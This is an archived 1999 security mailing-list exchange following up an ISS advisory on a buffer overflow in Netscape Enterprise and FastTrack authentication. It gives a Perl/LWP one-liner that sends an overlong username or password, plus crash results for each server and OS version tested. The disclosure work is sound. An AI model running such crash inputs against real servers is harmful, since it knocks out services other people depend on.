Some more data. Using LWP's "GET" as follows: $ GET -C `perl -e 'print "A"x1025'`:password http://hostname:port Netscape FastTrack 3.0.1 on NT: crashes Admin Server 3.5 on NT: crashes Netscape FastTrack 3.0.2 on Irix 6.x: no problem Admin Sever 3.5 on Irix 6.x: no problem Netscape Enterprise 3.6sp2 on Irix 6.x: no problem -- Brock Sides Unix Systems Administration Towery Publishing bsidesat_private On Thu, 2 Dec 1999, Doug Monroe wrote: > RE: > > ISS Security Advisory > > December 1, 1999 > > Buffer Overflow in Netscape Enterprise and FastTrack Authentication > > Procedure > > I made a few simple pokes with variants of perl LWP's 'GET' function at > areas of 2 NES 3.x servers that are protected with Basic Authentication. > For example- > $ GET -C username:`perl -e 'print "A"x1025'` http://server/private-path > $ GET -C `perl -e 'print "A"x1025'`:password http://server/private-path > > Solaris 2.6/NES 3.5.1 (and 3.6.3)- > username:LONGpw -> http://server/private-path - NO KILL > LONGusername:pw -> http://server/private-path - NO KILL > > NT4/SP4/NES 3.6.2- > username:LONGpw -> http://server/private-path - NO KILL > LONGusername:pw -> http://server/private-path - KILL > > Potentially important diffs/notes: > On the Solaris box, the private area was config'd with .nsconfig/NCSA-style > ACL. > On the NT, the private area was protected using local-db ACL, not NCSA-style. > I have not tried poking a local-db/LDIF protected area on Solaris. > I have not tried poking a .nsconfig/NCSA-style area on NT. > I have not tried poking at the admin server of either box. > -- > Doug Monroe > www.interhack.net >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:16:53 PDT